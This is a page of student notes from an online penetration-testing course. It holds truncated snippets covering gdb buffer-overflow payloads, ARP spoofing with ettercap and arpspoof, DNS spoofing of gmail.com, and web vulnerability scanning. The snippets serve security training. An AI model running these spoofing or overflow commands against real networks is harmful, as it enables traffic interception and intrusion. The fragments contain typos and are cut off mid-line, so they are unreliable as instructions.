Advanced Penetration Testing Notes

1

linux experience is kinda needed/assumed many tools are linux only most linux tools are open sourced many servers, dB, web services are linux based pwd – print working directory man – manual  ls -l – brings up file permissions  /d [view]

By: testing223 | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: April 2, 2018

Part 6

(Part 6: Unintended Code) (gdb) list 1,16 (gdb) disassemble overflowed (gdb) run $(python -c ’print ”A” * 9 + ”\x08\x04\x83\xf4” ’) , choose y (gdb) x/16xw $esp (gdb) x/xw $ebp (gdp) continue (gdb) x/16xw $esp (gdb [view]

By: GrapeApe561 | Related Lesson: Exploit Development (part 6) Executing Unintended Code | Modified: April 2, 2018

Traffic capture P2

Wireshark to capture traffic packets and other stuff turn off use prosocis mode ftp IP t [view]

By: Musaid | Related Lesson: Traffic Capture (part 2) Analyzing Network Protocol with Wireshark | Modified: April 2, 2018

vuln scn part 6

zervit 0.4 IP:PORT nc IP port number like 25 VRFY name you want to check it’s there   [view]

By: Musaid | Related Lesson: Vulnerability Scanning (part 6) Directory Transversals | Modified: April 1, 2018

How do I turn notes off?

How do I hide this stupid shit? And they are all public. Brilliant idea. By brilliant I sarcastically mean terrible. [view]

By: sanfordwallace | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: April 1, 2018

part 5

(Part 5: Python) (gdb) run $(python -c ’print ”A” * 9 + ”B” * 4’) (gdb) x/16xw $esp (gdb) x/xw $ebp (gdb) continue (gdb) x/16xw $esp (gdb) disassemble main (gdb) x/xw $ebp (gdb) continue (gdb) x/16xw $esp (gdb) inf [view]

By: GrapeApe561 | Related Lesson: Exploit Development (part 5) Python | Modified: April 1, 2018

ettercap

ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /<victims>/ nano /etc/ettercap/etter.conf ec_uid=0 ec_gid=0 iptales routes are un commented  remove # redir_command_on & red_command_off [view]

By: vijaysimha12345 | Related Lesson: Traffic Capture (part 5) ettercap | Modified: April 1, 2018

dns spoofing

 arpspoof -i eth0 192.168.1.1  <ip of VIctim> nano /root/hosts.txt 127.0.0.1 www.gmail.com  ctrl+x dnsspoof -i eth0 /root/hosts.txt   [view]

By: vijaysimha12345 | Related Lesson: Traffic Capture (part 4) DNS | Modified: April 1, 2018

arpspoofing in kali

for arp spoofing command# arpspoof -i eth0 <ip1 of target machine> <ip2 of target machine> all the requests from the target machine will come to attcker and if we dont forward it it might cause denial of service on attacker macine therefo [view]

By: vijaysimha12345 | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: April 1, 2018

vulnerabilty part5!!!

mysql -h 192.123123123 write http://192.1292341234 or IP/webdav cadaver http://IP/webdav cadaver http://IP/phpmyadmin dirbuster nikto -h http://IP IP/nickiwiki [view]

By: Musaid | Related Lesson: Vulnerability Scanning (part 5) WebApp, XAMPP, WEBDAV, nikto | Modified: April 1, 2018

« First ‹ Previous 1 4 5 6 7 8 16 106 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel